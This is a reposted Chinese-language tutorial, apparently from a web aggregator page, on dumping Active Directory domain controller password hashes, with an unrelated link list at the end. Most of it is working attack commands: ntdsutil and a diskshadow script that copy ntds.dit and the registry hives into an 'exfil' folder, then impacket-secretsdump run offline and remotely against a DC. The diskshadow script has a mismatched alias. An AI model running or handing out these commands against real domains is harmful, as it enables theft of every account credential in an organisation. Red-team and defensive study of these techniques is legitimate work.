当前位置: 首页 > news >正文

在本地和远程转储域控制器哈希

更多内网知识课前往无问社区查看icon-default.png?t=O83Ahttp://www.wwlib.cn
无凭据 - ntdsutil

如果您没有凭据,但有权访问 DC,则可以使用 lolbin ntdsutil.exe转储 ntds.dit:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

我们可以看到 ntds.dit 和 SYSTEM 以及 SECURITY 注册表配置单元正在转储到 c:\temp:

图片

然后,我们可以使用 impacket 离线转储密码哈希:

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

图片

无凭证 - diskshadow

在 Windows Server 2008+ 上,我们可以使用 diskshadow 来获取 ntdis.dit。

创建一个 shadowdisk.exe 脚本,指示创建磁盘 C 的新卷影磁盘副本(在本例中为 ntds.dit 位于其中),并将其公开为驱动器 Z:\

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:

现在执行以下命令:

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

下面显示了 ntds.dit 被提取并放入我们的 c:\exfil 文件夹:

图片

在交互式 diskshadow 实用程序中,清理影子卷:

diskshadow.exe> delete shadows volume trophy> reset
使用凭证

如果你拥有可以登录到 DC 的帐户的凭据,则可以通过 RPC 协议使用 impacket 远程转储 NTDS.dit 中的哈希:

impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6

图片

http://www.lryc.cn/news/508489.html

相关文章:

  • 基于SSM+Vue的心理咨询问诊系统+LW示例参考
  • 基于TMS320X281X/F28335的DSP入门到精通01_如何开始DSP的学习与开发
  • Java爬虫获取1688 item_search_img接口详细解析
  • Java 连接 FTP 服务器全解析
  • 字节跳动C++面试题及参考答案(下)
  • Rabbit MQ知识总结
  • 未来将要被淘汰的编程语言
  • GO环境安装和配置
  • 面试题整理(四)
  • mathtype中如何在公式和序号之间加点
  • 【电源专题】电源芯片的PG(Power Good)管脚是什么?
  • C/C++圣诞树
  • 牛客--求小球落地5次后所经历的路程和第5次反弹的高度,称砝码
  • cad学习 day6
  • Chrome 浏览器插件获取网页 iframe 中的 window 对象
  • 免费线上签字小程序,开启便捷电子签名
  • IT运维的365天--021 服务器上的dns设置后不起作用
  • 深信服企业级数据备份与恢复系统(整机裸机恢复)
  • Tool之Excalidraw:Excalidraw(开源的虚拟手绘风格白板)的简介、安装和使用方法、艾米莉应用之详细攻略
  • OPPO C++面试题及参考答案
  • Unity中LineRenderer使用MeshCollider方法参考
  • BERT模型入门(1)BERT的基本概念
  • 致命错误: Class ‘ZipArchive‘ not found
  • 二手车交易平台开发:安全与效率的双重挑战
  • vector题目
  • 测试测试测试测试测试测试测试测试测试测试
  • Cisco WebEx 数据平台:统一 Trino、Pinot、Iceberg 及 Kyuubi,探索 Apache Doris 在 Cisco 的改造实践
  • 大恒相机开发(3)—大恒相机工业检测的实际案例
  • 【泛微表单】流程相关信息修改
  • LeetCode80.删除有序数组的重复项